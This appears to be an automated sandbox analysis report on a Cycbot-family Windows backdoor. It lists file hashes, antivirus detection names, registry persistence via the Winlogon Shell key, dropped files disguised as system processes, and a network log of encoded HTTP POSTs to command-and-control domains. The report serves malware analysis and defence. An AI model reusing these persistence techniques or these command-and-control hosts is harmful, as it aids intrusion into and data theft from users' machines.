Analysis Date: 2015-01-17 01:42:18
MD5: 2e43e403e87f563a6c2b7faf5706753f
SHA1: bae3578b4c81fc6c8fe99c269a4aa017749554d5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 4d45b2e0b623bd8723d5f6a649c43e33 sha1: f4d31f4896e695d264f7d2ed1dd5c7f09ee5c604 size: 99328
Section: .rdata md5: 22d032028f7b99c6f89ec1f772c44f26 sha1: d7d29dc447101e1d73f401a8ecdb802507711871 size: 2048
Section: .data md5: 5d450662492b17d527df8584663a579f sha1: 27da32bb1308244ad6d997687e17fb9d90b99377 size: 80896
Section: .reloc md5: ca1c4585c604c1723034ef5712a17a73 sha1: 6aa45d4818b7bbfb33f799c4d97753e79af325ba size: 1024
Timestamp: 2005-09-25 12:30:25
PEhash: 70d67038568d98578e71d85a90ca3a594b773a69
IMPhash: 2ad5b6992a5dcf3b9c3d6c9cf36dc11f
AV: 360 Safe: no_virus
AV: Ad-Aware: Gen:Heur.Conjar.5
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): Gen:Heur.Conjar.5
AV: Authentium: W32/Goolbot.K.gen!Eldorado
AV: Avira (antivir): TR/Crypt.ZPACK.Gen
AV: BullGuard: Gen:Heur.Conjar.5
AV: CA (E-Trust Ino): Win32/FraudSecurity.B!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: no_virus
AV: Dr. Web: Trojan.DownLoader5.478
AV: Emsisoft: Gen:Heur.Conjar.5
AV: Eset (nod32): Win32/Kryptik.TJJ
AV: Fortinet: W32/FakeAV.ISS!tr
AV: Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV: F-Secure: Rogue:W32/OpenCloud.A
AV: Grisoft (avg): Win32/Cryptor
AV: Ikarus: Backdoor.Win32.Cycbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Trojan.Win32.Generic
AV: MalwareBytes: Backdoor.Bot
AV: Mcafee: BackDoor-EXI.gen.s
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Gen:Heur.Conjar.5
AV: Rising: Backdoor.Win32.Cycbot.a
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Backdoor.Cycbot!gen7
AV: Trend Micro: BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: resetmymemory.com
Winsock DNS: worldmotoblo.com
Winsock DNS: 127.0.0.1
Winsock DNS: crazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: crazyleafdesign.com
Type: A
199.201.88.112
DNS: zonedg.com
Type: A
141.8.225.80
DNS: resetmymemory.com
Type: A
192.155.89.148
DNS: worldmotoblo.com
Type: A
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqJSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GET: http://resetmymemory.com/blog/images/3521.jpg?v34=92&tq=gKZEtzyMv5rJqxG1J42pzMffBfQo1%2BjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaS%2FT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 199.201.88.112:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 192.155.89.148:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1041 ➝ 141.8.225.80:80

Raw Pcap


Strings